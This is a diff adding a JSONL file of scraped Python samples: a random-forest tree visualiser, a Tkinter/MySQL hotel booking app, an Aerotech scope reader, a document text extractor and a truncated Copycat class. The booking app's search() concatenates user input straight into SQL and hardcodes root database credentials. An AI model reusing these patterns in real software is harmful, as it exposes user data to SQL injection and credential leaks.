diff --git "a/637.jsonl" "b/637.jsonl" new file mode 100644--- /dev/null +++ "b/637.jsonl" @@ -0,0 +1,638 @@ +{"seq_id":"76661690","text":"from sklearn import datasets\nfrom sklearn.ensemble import RandomForestClassifier\nfrom IPython.display import Image\nfrom sklearn import tree\nimport pydotplus\nimport os\nos.environ[\"PATH\"] += os.pathsep + 'D:/Anaconda3/Library/bin/graphviz'\n\n# Still use the built-in iris dataset\niris = datasets.load_iris()\nX = iris.data\ny = iris.target\n\n# Train the model, limiting the maximum tree depth to 4\nclf = RandomForestClassifier(n_estimators=10, max_depth=4) # generates 10 trees by default\n# Fit the model\nclf.fit(X, y)\n\nEstimators = clf.estimators_\nfor index, model in enumerate(Estimators):\n filename = 'iris_' + str(index) + '.pdf'\n dot_data = tree.export_graphviz(model , out_file=None,\n feature_names=iris.feature_names,\n class_names=iris.target_names,\n filled=True, rounded=True,\n special_characters=True)\n graph = pydotplus.graph_from_dot_data(dot_data)\n # Display in the IPython terminal / Jupyter notebook.\n Image(graph.create_png())\n graph.write_png(filename)","sub_path":"featureExtrator/test/rf_visiualization_example.py","file_name":"rf_visiualization_example.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"407722971","text":"import ddarray\n\na = ddarray.double_ddarray(2, 3)\nfor i in range(2):\n for j in range(3):\n ddarray.setitem(a, i, j, i + 1)\n\nprint (ddarray.calculate(a, 2, 3))\nfor i in range(2):\n\tfor j in range(3):\n\t\tprint(\"{} \".format(ddarray.getitem(a,i,j)))\nddarray.deleteddarray(a,2,3)","sub_path":"eureka/testeddarray.py","file_name":"testeddarray.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"428526779","text":"from tkinter import *\r\nfrom PIL import Image,ImageTk\r\nfrom tkinter import ttk\r\nimport random\r\nfrom time import strftime\r\nfrom datetime import datetime\r\nimport mysql.connector\r\nfrom tkinter import messagebox\r\n\r\nclass Roombooking:\r\n\r\n def __init__(self,root):\r\n self.root = root\r\n self.root.title(\"Hotel Management System\")\r\n self.root.geometry(\"1000x550+230+148\")\r\n\r\n self.var_contact=StringVar()\r\n self.var_checkin=StringVar()\r\n self.var_checkout=StringVar()\r\n self.var_roomtype=StringVar()\r\n self.var_roomavailable=StringVar()\r\n self.var_meal=StringVar()\r\n self.var_noofdays=StringVar()\r\n self.var_paidtax=StringVar()\r\n self.var_actualtotal=StringVar()\r\n self.var_total=StringVar()\r\n\r\n lbl_title=Label(self.root,text=\"Booking DETAILS\",font=(\"times new roman\",18,\"bold\"),bg=\"black\",fg=\"gold\",bd=4,relief=RIDGE)\r\n lbl_title.place(x=0,y=0,width=1000,height=50)\r\n\r\n img2=Image.open(r\"C:\\Users\\nisha\\OneDrive\\Desktop\\python\\Hotel Management dbms\\images\\logo.png\")\r\n img2=img2.resize((100,40),Image.ANTIALIAS)\r\n self.photoimg2=ImageTk.PhotoImage(img2)\r\n lblimg=Label(self.root,image=self.photoimg2,bd=2,relief=RIDGE)\r\n lblimg.place(x=5,y=2,width=100,height=40)\r\n\r\n labelframeleft=LabelFrame(self.root,bd=2,text=\"Roombooking DETAILS\",font=(\"times new roman\",12,\"bold\"),relief=RIDGE,padx=2)\r\n labelframeleft.place(x=5,y=50,width=405,height=450)\r\n\r\n lbl_cusr_contact=Label(labelframeleft,text=\"Customer Reference No\",font=(\"times new roman\",11,\"bold\"),padx=2,pady=6)\r\n lbl_cusr_contact.grid(row=0,column=0,sticky=W)\r\n enty_contact=ttk.Entry(labelframeleft,textvariable=self.var_contact,width=18,font=(\"times new 
roman\",11,\"bold\"))\r\n enty_contact.grid(row=0,column=1,sticky=W)\r\n\r\n btnFetchData=Button(labelframeleft,command=self.Fetch_contact,text=\"Fetch Data\",font=(\"times new roman\",7,\"bold\"),bg=\"black\",fg=\"gold\",width=7)\r\n btnFetchData.place(x=320,y=3)\r\n\r\n check_in_date=Label(labelframeleft,text=\"Check_in Date\",font=(\"times new roman\",11,\"bold\"),padx=2,pady=6)\r\n check_in_date.grid(row=1,column=0,sticky=W)\r\n txtcheck_in_date=ttk.Entry(labelframeleft,textvariable=self.var_checkin,width=25,font=(\"times new roman\",11,\"bold\"))\r\n txtcheck_in_date.grid(row=1,column=1)\r\n\r\n lbl_Check_out=Label(labelframeleft,text=\"Check_out Date\",font=(\"times new roman\",11,\"bold\"),padx=2,pady=6)\r\n lbl_Check_out.grid(row=2,column=0,sticky=W)\r\n txt_Check_out=ttk.Entry(labelframeleft,textvariable=self.var_checkout,width=25,font=(\"times new roman\",11,\"bold\"))\r\n txt_Check_out.grid(row=2,column=1)\r\n\r\n label_RoomType=Label(labelframeleft,text=\"Room Type\",font=(\"times new roman\",11,\"bold\"),padx=2,pady=6)\r\n label_RoomType.grid(row=3,column=0,sticky=W)\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"password\",database=\"sys\")\r\n my_cursor=conn.cursor()\r\n my_cursor.execute(\"select distinct RoomType from details\")\r\n ide=my_cursor.fetchall()\r\n combo_RoomType=ttk.Combobox(labelframeleft,textvariable=self.var_roomtype,font=(\"times new roman\",11,\"bold\"),width=18,state=\"readonly\")\r\n combo_RoomType[\"value\"]=ide\r\n combo_RoomType.current(1)\r\n combo_RoomType.grid(row=3,column=1)\r\n btnFetchData=Button(labelframeleft,command=self.Fetch_room,text=\"Fetch Data\",font=(\"times new roman\",7,\"bold\"),bg=\"black\",fg=\"gold\",width=7)\r\n btnFetchData.place(x=320,y=103)\r\n\r\n lblRoomAvailable=Label(labelframeleft,text=\"Available Room\",font=(\"times new roman\",11,\"bold\"),padx=2,pady=6)\r\n lblRoomAvailable.grid(row=4,column=0,sticky=W)\r\n txtRoomAvailable=ttk.Entry(labelframeleft,textvariable=self.var_roomavailable,width=25,font=(\"times new roman\",11,\"bold\"),state=\"readonly\")\r\n txtRoomAvailable.grid(row=4,column=1)\r\n\r\n lblMeal=Label(labelframeleft,text=\"Meal\",font=(\"times new roman\",11,\"bold\"),padx=2,pady=6)\r\n lblMeal.grid(row=5,column=0,sticky=W)\r\n txtMeal=ttk.Entry(labelframeleft,textvariable=self.var_meal,width=25,font=(\"times new roman\",11,\"bold\"))\r\n txtMeal.grid(row=5,column=1)\r\n\r\n lblNoOfDays=Label(labelframeleft,text=\"No Of Days\",font=(\"times new roman\",11,\"bold\"),padx=2,pady=6)\r\n lblNoOfDays.grid(row=6,column=0,sticky=W)\r\n txtNoOfDays=ttk.Entry(labelframeleft,textvariable=self.var_noofdays,width=25,font=(\"times new roman\",11,\"bold\"))\r\n txtNoOfDays.grid(row=6,column=1)\r\n\r\n lblNoOfDays=Label(labelframeleft,text=\"Tax Paid\",font=(\"times new roman\",11,\"bold\"),padx=2,pady=6)\r\n lblNoOfDays.grid(row=7,column=0,sticky=W)\r\n txtNoOfDays=ttk.Entry(labelframeleft,textvariable=self.var_paidtax,width=25,font=(\"times new roman\",11,\"bold\"))\r\n txtNoOfDays.grid(row=7,column=1)\r\n\r\n lblNoOfDays=Label(labelframeleft,text=\"Sub Total\",font=(\"times new roman\",11,\"bold\"),padx=2,pady=6)\r\n lblNoOfDays.grid(row=8,column=0,sticky=W)\r\n txtNoOfDays=ttk.Entry(labelframeleft,textvariable=self.var_actualtotal,width=25,font=(\"times new roman\",11,\"bold\"))\r\n txtNoOfDays.grid(row=8,column=1)\r\n\r\n lblTotal=Label(labelframeleft,text=\"Total\",font=(\"times new roman\",11,\"bold\"),padx=2,pady=6)\r\n lblTotal.grid(row=9,column=0,sticky=W)\r\n 
txtTotal=ttk.Entry(labelframeleft,textvariable=self.var_total,width=25,font=(\"times new roman\",11,\"bold\"))\r\n txtTotal.grid(row=9,column=1)\r\n\r\n btnBill=Button(labelframeleft,command=self.total,text=\"Bill\",font=(\"times new roman\",11,\"bold\"),bg=\"black\",fg=\"gold\",width=9)\r\n btnBill.grid(row=10,column=0,padx=1,sticky=W)\r\n\r\n btn_frame=Frame(labelframeleft,bd=2,relief=RIDGE)\r\n btn_frame.place(x=0,y=370,width=380,height=40)\r\n\r\n btnAdd=Button(btn_frame,command=self.add_data,text=\"Add\",font=(\"times new roman\",11,\"bold\"),bg=\"black\",fg=\"gold\",width=9)\r\n btnAdd.grid(row=0,column=0,padx=1)\r\n\r\n btnUpdate=Button(btn_frame,command=self.update,text=\"Update\",font=(\"times new roman\",11,\"bold\"),bg=\"black\",fg=\"gold\",width=9)\r\n btnUpdate.grid(row=0,column=1,padx=1)\r\n\r\n btnDelete=Button(btn_frame,command=self.mDelete,text=\"Delete\",font=(\"times new roman\",11,\"bold\"),bg=\"black\",fg=\"gold\",width=9)\r\n btnDelete.grid(row=0,column=2,padx=1)\r\n\r\n btnReset=Button(btn_frame,command=self.reset,text=\"Reset\",font=(\"times new roman\",11,\"bold\"),bg=\"black\",fg=\"gold\",width=9)\r\n btnReset.grid(row=0,column=3,padx=1)\r\n\r\n img3=Image.open(r\"C:\\Users\\nisha\\OneDrive\\Desktop\\python\\Hotel Management dbms\\images\\download (3).jfif\")\r\n img3=img3.resize((300,300),Image.ANTIALIAS)\r\n self.photoimg3=ImageTk.PhotoImage(img3)\r\n lblimg=Label(self.root,image=self.photoimg3,bd=2,relief=RIDGE)\r\n lblimg.place(x=750,y=55,width=300,height=300)\r\n\r\n Table_Frame=LabelFrame(self.root,bd=2,text=\"VIEW DETAILS & SEARCH SYSTEM\",font=(\"times new roman\",12,\"bold\"),relief=RIDGE,padx=2)\r\n Table_Frame.place(x=415,y=280,width=585,height=220)\r\n\r\n lblSearchBy=Label(Table_Frame,text=\"Search By\",font=(\"times new roman\",11,\"bold\"),bg=\"red\",fg=\"white\")\r\n lblSearchBy.grid(row=0,column=0,sticky=W,padx=1)\r\n self.serch_var=StringVar()\r\n combo_Search=ttk.Combobox(Table_Frame,textvariable=self.serch_var,font=(\"times new roman\",11,\"bold\"),width=14,state=\"readonly\")\r\n combo_Search[\"value\"]=(\"Contact\",\"Room\")\r\n combo_Search.current(1)\r\n combo_Search.grid(row=0,column=1,padx=1)\r\n self.txt_search=StringVar()\r\n txtSearch=ttk.Entry(Table_Frame,width=18,textvariable=self.txt_search,font=(\"times new roman\",11,\"bold\"))\r\n txtSearch.grid(row=0,column=2,padx=1)\r\n\r\n btnSearch=Button(Table_Frame,command=self.search,text=\"Search\",font=(\"times new roman\",11,\"bold\"),bg=\"black\",fg=\"gold\",width=9)\r\n btnSearch.grid(row=0,column=3,padx=1)\r\n\r\n btnShowAll=Button(Table_Frame,command=self.fetch_data,text=\"Show All\",font=(\"times new roman\",11,\"bold\"),bg=\"black\",fg=\"gold\",width=9)\r\n btnShowAll.grid(row=0,column=4,padx=1)\r\n\r\n details_table=Frame(Table_Frame,bd=2,relief=RIDGE)\r\n details_table.place(x=0,y=50,width=555,height=160)\r\n\r\n scroll_x=ttk.Scrollbar(details_table,orient=HORIZONTAL)\r\n scroll_y=ttk.Scrollbar(details_table,orient=VERTICAL)\r\n\r\n self.room_table=ttk.Treeview(details_table,column=(\"contact\",\"checkin\",\"checkout\",\"roomtype\",\"roomavailable\",\"meal\",\"noofdays\",),xscrollcommand=scroll_x.set,yscrollcommand=scroll_y.set)\r\n scroll_x.pack(side=BOTTOM,fill=X)\r\n scroll_y.pack(side=RIGHT,fill=Y)\r\n scroll_x.config(command=self.room_table.xview)\r\n scroll_y.config(command=self.room_table.yview)\r\n\r\n self.room_table.heading(\"contact\",text=\"Ref\")\r\n self.room_table.heading(\"checkin\",text=\"Check-in\")\r\n 
self.room_table.heading(\"checkout\",text=\"Check-out\")\r\n self.room_table.heading(\"roomtype\",text=\"Room type\")\r\n self.room_table.heading(\"roomavailable\",text=\"Room No.\")\r\n self.room_table.heading(\"meal\",text=\"Meal\")\r\n self.room_table.heading(\"noofdays\",text=\"NoOfDays\")\r\n self.room_table[\"show\"]=\"headings\"\r\n self.room_table.column(\"contact\",width=100)\r\n self.room_table.column(\"checkin\",width=100)\r\n self.room_table.column(\"checkout\",width=100)\r\n self.room_table.column(\"roomtype\",width=100)\r\n self.room_table.column(\"roomavailable\",width=100)\r\n self.room_table.column(\"meal\",width=100)\r\n self.room_table.column(\"noofdays\",width=100)\r\n self.room_table.pack(fill=BOTH,expand=1)\r\n self.room_table.bind(\"<ButtonRelease-1>\",self.get_cuersor)\r\n self.fetch_data()\r\n\r\n def add_data(self):\r\n if self.var_contact.get()==\"\" or self.var_checkin.get()==\"\":\r\n messagebox.showerror(\"ERROR\",\"All fields are required\",parent=self.root)\r\n else:\r\n try:\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"password\",database=\"sys\")\r\n my_cursor=conn.cursor()\r\n my_cursor.execute(\"insert into room values(%s,%s,%s,%s,%s,%s,%s)\",(self.var_contact.get(),self.var_checkin.get(),self.var_checkout.get(),self.var_roomtype.get(),self.var_roomavailable.get(),self.var_meal.get(),self.var_noofdays.get()))\r\n conn.commit()\r\n self.fetch_data()\r\n conn.close()\r\n messagebox.showinfo(\"SUCCESS\",\"Booking added successfully\",parent=self.root)\r\n except Exception as es:\r\n messagebox.showwarning(\"WARNING\",f\"Something went wrong:{str(es)}\",parent=self.root)\r\n\r\n def fetch_data(self):\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"password\",database=\"sys\")\r\n my_cursor=conn.cursor()\r\n my_cursor.execute(\"select * from room\")\r\n rows=my_cursor.fetchall()\r\n if len(rows)!=0:\r\n self.room_table.delete(*self.room_table.get_children())\r\n for i in rows:\r\n self.room_table.insert(\"\",END,values=i)\r\n conn.commit()\r\n conn.close()\r\n\r\n def get_cuersor(self,event=\"\"):\r\n cusrsor_row=self.room_table.focus()\r\n content=self.room_table.item(cusrsor_row)\r\n row=content[\"values\"]\r\n self.var_contact.set(row[0]),\r\n self.var_checkin.set(row[1]),\r\n self.var_checkout.set(row[2]),\r\n self.var_roomtype.set(row[3]),\r\n self.var_roomavailable.set(row[4]),\r\n self.var_meal.set(row[5]),\r\n self.var_noofdays.set(row[6])\r\n\r\n def update(self):\r\n if self.var_contact.get()==\"\":\r\n messagebox.showerror(\"ERROR\",\"Mobile no. 
is required\",parent=self.root)\r\n else:\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"password\",database=\"sys\")\r\n my_cursor=conn.cursor()\r\n my_cursor.execute(\"update room set check_in=%s,check_out=%s,roomtype=%s,Room=%s,meal=%s,noOfdays=%s where Contact=%s\",(self.var_checkin.get(),self.var_checkout.get(),self.var_roomtype.get(),self.var_roomavailable.get(),self.var_meal.get(),self.var_noofdays.get(),self.var_contact.get()))\r\n conn.commit()\r\n self.fetch_data()\r\n conn.close()\r\n messagebox.showinfo(\"SUCCESS\",\"Booking details updated successfully\",parent=self.root)\r\n\r\n def mDelete(self):\r\n mDelete=messagebox.askyesno(\"SURE?\",\"Delete Booking?\",parent=self.root)\r\n if mDelete>0:\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"password\",database=\"sys\")\r\n my_cursor=conn.cursor()\r\n query=\"delete from room where Contact=%s AND check_in=%s AND check_out=%s AND Room=%s\"\r\n value=(self.var_contact.get(),self.var_checkin.get(),self.var_checkout.get(),self.var_roomavailable.get(),)\r\n my_cursor.execute(query,value)\r\n else:\r\n if not mDelete:\r\n return\r\n conn.commit()\r\n self.fetch_data()\r\n conn.close()\r\n\r\n def reset(self):\r\n self.var_contact.set(\"\"),\r\n self.var_checkin.set(\"\"),\r\n self.var_checkout.set(\"\"),\r\n self.var_roomtype.set(\"\"),\r\n self.var_roomavailable.set(\"\"),\r\n self.var_meal.set(\"\"),\r\n self.var_noofdays.set(\"\"),\r\n self.var_paidtax.set(\"\"),\r\n self.var_actualtotal.set(\"\"),\r\n self.var_total.set(\"\")\r\n\r\n\r\n def Fetch_room(self):\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"password\",database=\"sys\")\r\n my_cursor=conn.cursor()\r\n showDataframe=Frame(self.root,bd=4,relief=RIDGE,padx=2)\r\n showDataframe.place(x=435,y=55,width=300,height=180)\r\n value=(self.var_roomtype.get(),)\r\n query=\"select RoomNo from details where RoomType=%s\"\r\n my_cursor.execute(query,value)\r\n rows=my_cursor.fetchall()\r\n combo_RoomNo=ttk.Combobox(showDataframe,textvariable=self.var_roomavailable,font=(\"times new roman\",11,\"bold\"),width=25,state=\"readonly\")\r\n combo_RoomNo[\"value\"]=rows\r\n combo_RoomNo.current()\r\n combo_RoomNo.grid(row=4,column=1)\r\n\r\n\r\n def Fetch_contact(self):\r\n if self.var_contact.get()==\"\":\r\n messagebox.showerror(\"ERROR\",\"Ref no. is required\",parent=self.root)\r\n else:\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"password\",database=\"sys\")\r\n my_cursor=conn.cursor()\r\n query=(\"select Name from customer where Ref=%s\")\r\n value=(self.var_contact.get(),)\r\n my_cursor.execute(query,value)\r\n row=my_cursor.fetchone()\r\n if row==None:\r\n messagebox.showerror(\"ERROR\",\"Ref no. 
not found\",parent=self.root)\r\n else:\r\n conn.commit()\r\n conn.close()\r\n showDataframe=Frame(self.root,bd=4,relief=RIDGE,padx=2)\r\n showDataframe.place(x=435,y=55,width=300,height=180)\r\n lblName=Label(showDataframe,text=\"Name\",font=(\"times new roman\",11,\"bold\"))\r\n lblName.place(x=0,y=0)\r\n lbl=Label(showDataframe,text=row,font=(\"times new roman\",11,\"bold\"))\r\n lbl.place(x=90,y=0)\r\n\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"password\",database=\"sys\")\r\n my_cursor=conn.cursor()\r\n query=(\"select Gender from customer where Ref=%s\")\r\n value=(self.var_contact.get(),)\r\n my_cursor.execute(query,value)\r\n row=my_cursor.fetchone()\r\n lblGender=Label(showDataframe,text=\"Gender\",font=(\"times new roman\",11,\"bold\"))\r\n lblGender.place(x=0,y=25)\r\n lbl2=Label(showDataframe,text=row,font=(\"times new roman\",11,\"bold\"))\r\n lbl2.place(x=90,y=25)\r\n\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"password\",database=\"sys\")\r\n my_cursor=conn.cursor()\r\n query=(\"select Email from customer where Ref=%s\")\r\n value=(self.var_contact.get(),)\r\n my_cursor.execute(query,value)\r\n row=my_cursor.fetchone()\r\n lblEmail=Label(showDataframe,text=\"Email\",font=(\"times new roman\",11,\"bold\"))\r\n lblEmail.place(x=0,y=50)\r\n lbl3=Label(showDataframe,text=row,font=(\"times new roman\",11,\"bold\"))\r\n lbl3.place(x=90,y=50)\r\n\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"password\",database=\"sys\")\r\n my_cursor=conn.cursor()\r\n query=(\"select Nationality from customer where Ref=%s\")\r\n value=(self.var_contact.get(),)\r\n my_cursor.execute(query,value)\r\n row=my_cursor.fetchone()\r\n lblNationality=Label(showDataframe,text=\"Nationality\",font=(\"times new roman\",11,\"bold\"))\r\n lblNationality.place(x=0,y=75)\r\n lbl4=Label(showDataframe,text=row,font=(\"times new roman\",11,\"bold\"))\r\n lbl4.place(x=90,y=75)\r\n\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"password\",database=\"sys\")\r\n my_cursor=conn.cursor()\r\n query=(\"select Address from customer where Ref=%s\")\r\n value=(self.var_contact.get(),)\r\n my_cursor.execute(query,value)\r\n row=my_cursor.fetchone()\r\n lblAddress=Label(showDataframe,text=\"Address\",font=(\"times new roman\",11,\"bold\"))\r\n lblAddress.place(x=0,y=100)\r\n lbl5=Label(showDataframe,text=row,font=(\"times new roman\",11,\"bold\"))\r\n lbl5.place(x=90,y=100)\r\n\r\n def search(self):\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"password\",database=\"sys\")\r\n my_cursor=conn.cursor()\r\n my_cursor.execute(\"select * from room where \"+str(self.serch_var.get())+\" LIKE '%\"+str(self.txt_search.get())+\"%'\")\r\n rows=my_cursor.fetchall()\r\n if len (rows)!=0:\r\n self.room_table.delete(*self.room_table.get_children())\r\n for i in rows:\r\n self.room_table.insert(\"\",END,values=i)\r\n conn.commit()\r\n conn.close()\r\n\r\n def total(self):\r\n inDate=self.var_checkin.get()\r\n outDate=self.var_checkout.get()\r\n inDate=datetime.strptime(inDate,\"%d/%m/%y\")\r\n outDate=datetime.strptime(outDate,\"%d/%m/%y\")\r\n self.var_noofdays.set(abs(outDate-inDate).days)\r\n\r\n if (self.var_meal.get()==\"Breakfast\" and self.var_roomtype.get()==\"Suite\"):\r\n q1=float(300)\r\n q2=float(12000)\r\n q3=float(self.var_noofdays.get())\r\n q4=float(q1+q2)\r\n q5=float(q3*q4)\r\n Tax=\"Rs.\"+str(\"%.2f\"%((q5)*0.1))\r\n 
ST=\"Rs.\"+str(\"%.2f\"%((q5)))\r\n TT=\"Rs.\"+str(\"%.2f\"%((q5)+((q5)*0.1)))\r\n self.var_paidtax.set(Tax)\r\n self.var_actualtotal.set(ST)\r\n self.var_total.set(TT)\r\n\r\n elif (self.var_meal.get()==\"Lunch\" and self.var_roomtype.get()==\"Suite\"):\r\n q1=float(500)\r\n q2=float(12000)\r\n q3=float(self.var_noofdays.get())\r\n q4=float(q1+q2)\r\n q5=float(q3*q4)\r\n Tax=\"Rs.\"+str(\"%.2f\"%((q5)*0.1))\r\n ST=\"Rs.\"+str(\"%.2f\"%((q5)))\r\n TT=\"Rs.\"+str(\"%.2f\"%((q5)+((q5)*0.1)))\r\n self.var_paidtax.set(Tax)\r\n self.var_actualtotal.set(ST)\r\n self.var_total.set(TT)\r\n\r\n elif (self.var_meal.get()==\"Dinner\" and self.var_roomtype.get()==\"Suite\"):\r\n q1=float(500)\r\n q2=float(12000)\r\n q3=float(self.var_noofdays.get())\r\n q4=float(q1+q2)\r\n q5=float(q3*q4)\r\n Tax=\"Rs.\"+str(\"%.2f\"%((q5)*0.1))\r\n ST=\"Rs.\"+str(\"%.2f\"%((q5)))\r\n TT=\"Rs.\"+str(\"%.2f\"%((q5)+((q5)*0.1)))\r\n self.var_paidtax.set(Tax)\r\n self.var_actualtotal.set(ST)\r\n self.var_total.set(TT)\r\n\r\n elif (self.var_meal.get()==\"Lunch\" and self.var_roomtype.get()==\"Deluxe\"):\r\n q1=float(500)\r\n q2=float(8000)\r\n q3=float(self.var_noofdays.get())\r\n q4=float(q1+q2)\r\n q5=float(q3*q4)\r\n Tax=\"Rs.\"+str(\"%.2f\"%((q5)*0.1))\r\n ST=\"Rs.\"+str(\"%.2f\"%((q5)))\r\n TT=\"Rs.\"+str(\"%.2f\"%((q5)+((q5)*0.1)))\r\n self.var_paidtax.set(Tax)\r\n self.var_actualtotal.set(ST)\r\n self.var_total.set(TT)\r\n\r\n elif (self.var_meal.get()==\"Breakfast\" and self.var_roomtype.get()==\"Deluxe\"):\r\n q1=float(300)\r\n q2=float(8000)\r\n q3=float(self.var_noofdays.get())\r\n q4=float(q1+q2)\r\n q5=float(q3*q4)\r\n Tax=\"Rs.\"+str(\"%.2f\"%((q5)*0.1))\r\n ST=\"Rs.\"+str(\"%.2f\"%((q5)))\r\n TT=\"Rs.\"+str(\"%.2f\"%((q5)+((q5)*0.1)))\r\n self.var_paidtax.set(Tax)\r\n self.var_actualtotal.set(ST)\r\n self.var_total.set(TT)\r\n\r\n elif (self.var_meal.get()==\"Dinner\" and self.var_roomtype.get()==\"Deluxe\"):\r\n q1=float(500)\r\n q2=float(8000)\r\n q3=float(self.var_noofdays.get())\r\n q4=float(q1+q2)\r\n q5=float(q3*q4)\r\n Tax=\"Rs.\"+str(\"%.2f\"%((q5)*0.1))\r\n ST=\"Rs.\"+str(\"%.2f\"%((q5)))\r\n TT=\"Rs.\"+str(\"%.2f\"%((q5)+((q5)*0.1)))\r\n self.var_paidtax.set(Tax)\r\n self.var_actualtotal.set(ST)\r\n self.var_total.set(TT)\r\n\r\n elif (self.var_meal.get()==\"Lunch\" and self.var_roomtype.get()==\"SuperDeluxe\"):\r\n q1=float(500)\r\n q2=float(10000)\r\n q3=float(self.var_noofdays.get())\r\n q4=float(q1+q2)\r\n q5=float(q3*q4)\r\n Tax=\"Rs.\"+str(\"%.2f\"%((q5)*0.1))\r\n ST=\"Rs.\"+str(\"%.2f\"%((q5)))\r\n TT=\"Rs.\"+str(\"%.2f\"%((q5)+((q5)*0.1)))\r\n self.var_paidtax.set(Tax)\r\n self.var_actualtotal.set(ST)\r\n self.var_total.set(TT)\r\n\r\n elif (self.var_meal.get()==\"Dinner\" and self.var_roomtype.get()==\"SuperDeluxe\"):\r\n q1=float(500)\r\n q2=float(10000)\r\n q3=float(self.var_noofdays.get())\r\n q4=float(q1+q2)\r\n q5=float(q3*q4)\r\n Tax=\"Rs.\"+str(\"%.2f\"%((q5)*0.1))\r\n ST=\"Rs.\"+str(\"%.2f\"%((q5)))\r\n TT=\"Rs.\"+str(\"%.2f\"%((q5)+((q5)*0.1)))\r\n self.var_paidtax.set(Tax)\r\n self.var_actualtotal.set(ST)\r\n self.var_total.set(TT)\r\n\r\n elif (self.var_meal.get()==\"Breakfast\" and self.var_roomtype.get()==\"SuperDeluxe\"):\r\n q1=float(300)\r\n q2=float(10000)\r\n q3=float(self.var_noofdays.get())\r\n q4=float(q1+q2)\r\n q5=float(q3*q4)\r\n Tax=\"Rs.\"+str(\"%.2f\"%((q5)*0.1))\r\n ST=\"Rs.\"+str(\"%.2f\"%((q5)))\r\n TT=\"Rs.\"+str(\"%.2f\"%((q5)+((q5)*0.1)))\r\n self.var_paidtax.set(Tax)\r\n self.var_actualtotal.set(ST)\r\n self.var_total.set(TT)\r\n\r\nif 
__name__=='__main__':\r\n root=Tk()\r\n obj=Roombooking(root)\r\n root.mainloop()\r\n","sub_path":"room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":23461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"525327088","text":"import sys\nimport asyncio\nimport logging\n\nimport aerotech\n\n\nasync def scope_reader(host, comm_port, scope_port, *, acquire=False):\n comm = aerotech.EnsembleDoCommand(host, comm_port)\n await comm.check_program_status()\n\n if acquire:\n data_points = 1000\n await comm.scope_start(data_points=data_points, period_ms=10)\n await comm.scope_wait()\n\n scopereader = aerotech.ScopeDataReader(comm, host=host, port=scope_port)\n data = await scopereader.read_data()\n print('data', data)\n\n\nif __name__ == '__main__':\n try:\n host = sys.argv[1]\n except IndexError:\n host = 'moc-b34-mc07.slac.stanford.edu'\n # host = 'moc-b34-mc08.slac.stanford.edu'\n\n logging.getLogger('aerotech').setLevel(logging.DEBUG)\n\n logging.basicConfig(format='%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(scope_reader(host, comm_port=8000,\n scope_port=8001))\n loop.close()\n","sub_path":"aerotech/examples/read_scope_data.py","file_name":"read_scope_data.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"552861011","text":"import docx\nfrom PyPDF2 import PdfFileReader\nimport os\n\nclass RawText:\n def __init__(self, location):\n self.contents = [] # make this a dict key should be type+#\n self.wtf(location)\n\n def wtf(self, location):\n # divide location string, let's work with windows\n file = location.split('/')\n fin = len(file) - 1\n\n # find the TYPE\n name = file[fin].split('.')\n matype = name[len(name) - 1]\n\n if matype in ('doc', 'docx'):\n self.wordreader(location)\n elif matype == \"pdf\" :\n self.pdfreader(location)\n else:\n self.otherreader()\n\n def wordreader(self,location):\n word = docx.Document(location)\n\n for p in word.paragraphs:\n self.contents.append(p.text)\n\n def pdfreader(self,location):\n pdf = PdfFileReader(open(location, \"rb\"))\n length = pdf.numPages\n\n for i in range(0,length):\n self.contents.append(pdf.getPage(i).extractText())\n\n def otherreader(self):\n print(\"I was made by a bad programmer\")\n\n\nif __name__ == \"__main__\":\n PATH = os.getcwd()\n x = RawText(PATH+\"\\\\1Resume.docx\")\n print(x.contents)","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"341957275","text":"import logging\nfrom letter import Letter\nfrom slipnet import slipnet\n\n\nclass WorkspaceString(object):\n def __init__(self, s):\n self.string = s\n self.bonds = []\n self.objects = []\n self.letters = []\n self.length = len(s)\n self.intraStringUnhappiness = 0.0\n if not self.length:\n return\n position = 0\n from workspace import workspace\n\n for c in self.string.upper():\n value = ord(c) - ord('A')\n letter = Letter(self, position + 1, self.length)\n letter.workspaceString = self\n letter.addDescription(slipnet.objectCategory, slipnet.letter)\n letter.addDescription(slipnet.letterCategory,\n slipnet.letters[value])\n letter.describe(position + 1, self.length)\n workspace.buildDescriptions(letter)\n self.letters += [letter]\n position += 1\n\n def 
